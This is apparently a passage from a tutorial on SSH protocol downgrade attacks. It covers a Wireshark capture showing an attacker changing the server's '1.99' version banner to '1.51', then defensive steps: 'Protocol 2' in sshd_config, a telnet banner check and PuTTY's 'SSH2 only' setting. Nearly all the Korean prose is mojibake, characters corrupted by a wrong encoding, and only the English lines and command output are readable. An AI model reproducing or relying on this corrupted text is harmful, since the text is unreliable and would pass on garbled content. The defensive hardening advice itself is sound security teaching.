SSH์„œ๋ฒ„์—์„œWireshark๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SSH๋งํฌ๊ฐ€ ์„ฑ๋ฆฝ์ด ๋˜๋Š” ์ˆœ์„œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. (ํด๋ฆญํ•˜์—ฌ ํฌ๊ฒŒ ๋ณผ ์ˆ˜ ์žˆ๋‹ค)

[Screenshot: Wireshark capture of the SSH1 initialisation process]

1. ์„œ๋ฒ„(192.168.1.68)์€ ํด๋ผ์ด์–ธํŠธ(192.168.1.132)๋กœ SSH1๊ณผ SSH2๋ฅผ ์ง€์›ํ•œ๋‹ค๋Š” ๋ฉ”์‹œ์ง€์ธ โ€œ1.99โ€ ์‘๋‹ต์„ ๋ณด๋ƒˆ๋‹ค.
2. โ€œ1.99โ€ ์‘๋‹ต์€ ํ•ด์ปคPC์— ์˜ํ•ด โ€œ1.51โ€๋กœ ๋ณ€๊ฒฝ์ด ๋˜์—ˆ์œผ๋ฏ€๋กœ ํด๋ผ์ด์–ธํŠธ๋Š” SSH1 ๋งํฌ๋กœ ์—ฐ๊ฒฐ ์š”์ฒญ์„ ํ•œ๋‹ค.
3. ์•”ํ˜ธํ™”๋œ SSH1 ํŒจํ‚ท์ด๋‹ค.

---------------- ๋Œ€์‘์ฑ… ----------------

SSH downgrade ๊ณต๊ฒฉ์„ ํ”ผํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์€ ๋ฌด์—‡์ธ๊ฐ€?

SSH ์„œ๋ฒ„์—์„œ SSH1 ํ”„๋กœํ† ์ฝœ ํ—ˆ์šฉ์„ ๊ธˆ์ง€ ํ•ด์•ผ ํ•˜๋ฉฐ ํด๋ผ์ด์–ธํŠธ๋„ ๊ฐ•์ œ๋กœ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜๋„๋ก ํ•˜์—ฌ์•ผ ํ•œ๋‹ค.
OpenSSH ์„œ๋ฒ„๋Š” ๋””ํดํŠธ๋กœ SSHv2๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๋˜์–ด์žˆ๋‹ค. Putty ๊ฐ™์€ ํด๋ผ์ด์–ธํŠธ์—์„œ๋Š” SSH1๊ณผ SSH2๋ฅผ ๋ชจ๋‘ ์‚ฌ์šฉํ• ์ˆ˜ ์žˆ๋„๋ก ๋˜์–ด์žˆ๋Š” ๊ฒƒ์„ ์ž์ฃผ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

SSH ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ์—์„œ ๋ณด์•ˆ ๊ฐ•ํ™”์‹œํ‚ค๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค.

SSH server:
Open the /etc/ssh/sshd_config file and check that only the SSH2 protocol is in use.

#vim /etc/ssh/sshd_config
Protocol 2
์„ค์ •ํŒŒ์ผ์„ ๋ณ€๊ฒฝํ•˜์˜€๋‹ค๋ฉด โ€œ/etc/init.d/ssh restartโ€ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ์„œ๋น„์Šค๋ฅผ ์žฌ์‹œ์ž‘ํ•˜์—ฌ์•ผ ํ•œ๋‹ค.
์„œ๋น„์Šค๋ฅผ ์žฌ์‹œ์ž‘ ํ–ˆ์œผ๋ฉด SSH2ํ”„๋กœํ† ์ฝœ๋งŒ ์ง€์›ํ•˜๋Š”์ง€ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•œ๋‹ค.

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.6p1 Debian-5ubuntu0.1

๋นจ๊ฐ„์ƒ‰์œผ๋กœ ํ‘œ์‹œ๋˜๋Š” ๋ฒ„์ „ ์ •๋ณด์— 2.0์ด ํ‘œ์‹œ๋˜์–ด์•ผ ํ•œ๋‹ค.

SSH client:
The client must also be forced to use the SSH2 protocol.
In Putty's left menu click "Connection" and select "SSH". On the right, select the "2 only" radio button.





์ „๋ฐ˜์ ์ธ ๋ณด์•ˆ ๊ทœ์น™์— ๋””ํดํŠธ ์„ค์ •์„ ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š” ๋ฒ„๋ฆ‡์ด ์ค‘์š”ํ•˜๋‹ค. ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ ๋ชจ๋‘ ๋ณด์•ˆ ์„ค์ •์„ ์ตœ๋Œ€ํ•œ ๋†’์—ฌ์„œ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•˜๋‹ค.